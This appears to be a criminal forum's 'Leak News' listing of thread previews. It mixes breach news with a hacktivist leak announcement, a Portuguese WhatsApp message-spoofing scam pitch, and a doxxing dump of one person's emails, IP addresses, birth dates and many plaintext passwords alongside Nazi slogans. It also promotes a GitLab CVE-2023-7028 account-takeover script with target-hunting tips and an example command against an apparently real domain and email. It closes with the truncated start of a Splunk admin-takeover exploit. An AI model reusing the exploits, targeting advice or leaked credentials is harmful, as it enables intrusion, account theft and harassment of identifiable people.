Leak News

News in the criminal world, information about leaks

Forum Prefix Filter

Sticky threads
In a coordinated message, GLORIAMIST, LAPSUS, and Anonymous groups have issued a statement regarding their forthcoming action targeting the French Ministry of Agriculture’s database. They have announced their intention to release a portion of this extensive database to the public, with only 5% of its contents being made available as a preview. This announcement signals a significant cybersecurity threat and underscores the scale of the database breach.
MITRE's Recent Network Review and Response MITRE, a key organization involved in federal research and development for the US government, recently conducted a thorough review of one of its network systems due to a detected security concern. The review focused on the Networking Experimentation, Research and Virtualization Environment (NERVE), which was temporarily deactivated to ensure comprehensive analysis. The proactive network analysis was initiated when MITRE observed irregular activity in early April. Immediate measures were implemented to address the situation, which included temporarily deactivating the NERVE network to facilitate a detailed investigation supported by MITRE’s internal team alongside recognized external experts...
Flagstar Bank is warning that over 800,000 US customers had their personal information stolen by cybercriminals due to a breach at a third-party service provider. Flagstar, now owned by the New York Community Bank, is a Michigan-based financial services provider that, before its acquisition last year, was one of the largest banks in the United States, having total assets of over $31 billion. A data breach notification sent to impacted customers explains that Flagstar was indirectly impacted by Fiserv, a vendor it uses for payment processing and mobile banking services. Fiserv was breached in the widespread CLOP MOVEit Transfer data theft attacks that have impacted over 64 million people and two thousand organizations worldwide...
EUA: Assista esse vídeo onde deixei o link, lá você aprenderá como hackear túneis do WhatsApp.. Poder enviar milhares de mensagens sem ser bloqueado. O destinatário receberá uma mensagem como se fosse ele quem a enviasse. Isso é muito poderoso, você pode enviar uma mensagem para milhares de números da empresa desejada apenas usando um comando + número da empresa. Sem precisar baixar muitas coisas, você consegue fazer isso mesmo sem nenhum conhecimento na área digital. Assista aqui ....................... BR: Assista a esse vídeo na qual eu deixei o link, la você aprendera a invadir os tuneis do WhatsAppp.. Posso enviar milhares de mensagens sem tomar bloqueios. O destinatário receberá uma mensagem como se fosse ele mesmo que...
858064991@qq.com bfbf510a@azet.sk bfbf510a@bol.com.br bfbf510a@gmail.com chrisxxbrisk14@gmail.com 221.124.203.221 1520510571 119.247.151.28 221.124.200.45 bfbf510a 97.86.240.17 hyperxchris Hyperxchris hyperxchris14 Nazism Communism Hail Hitler OOF Chris Chow Chris Kim ChrisRozayy ChrisChow12 +852 +852 Hong Kong HK oCxLEGITo - - - 1997 December 25 1989-09-09 39681873 +852 67** **57 Password: kitakami007 Kitakami007 meisON9 meisON9! meisON9!mkrk9898 mkrk9898 Mkrk9898 Mkrk9898kitakami007 hyperxchris ufforlife stevens3 phenomenal Ufforlife!! ufforlife14 Ufforlife14. S9KHLvEQ9eG5n2auThm2+Q== ××××××××e▯ <3<3<3
ZeroClick attack CVE-2023-7028 Gitlab access for universities worldwide and a growing number of companies. Fork this script and execute with requiered infos https://github.com/RandomRobbieBF/CVE-2023-7028 How to find Self-hosted Gitlab: Shodan.io Google dork with "gitlab" like: ethereum gitlab Example: python ./CVE-2023-7028.py -u https://gitlab.mintech.kr -t jakyung.ham@mintech.kr You can found Big datas.
A decryptor for the Tortilla variant of the Babuk ransomware has been released by Cisco Talos, allowing victims targeted by the malware to regain access to their files. The cybersecurity firm said the threat intelligence it shared with Dutch law enforcement authorities made it possible to arrest the threat actor behind the operations. The encryption key has also been shared with Avast, which had previously released a decryptor for Babuk ransomware after its source code was leaked in September 2021. The updated decryptor can be accessed here [EXE file].
#!/usr/bin/env python3 # # Exploit Title: Splunk 9.0.5 - admin account take over # Author: [Redway Security](https://twitter.com/redwaysec)) # Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99) #CVE: CVE-2023-32707 # Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned # to it can escalate their privileges to that of the admin user by providing specially crafted web requests. # # Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14. # import argparse import requests import random import string import base64 # ignore warnings import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Parse command-line arguments parser =...
Back
Top Bottom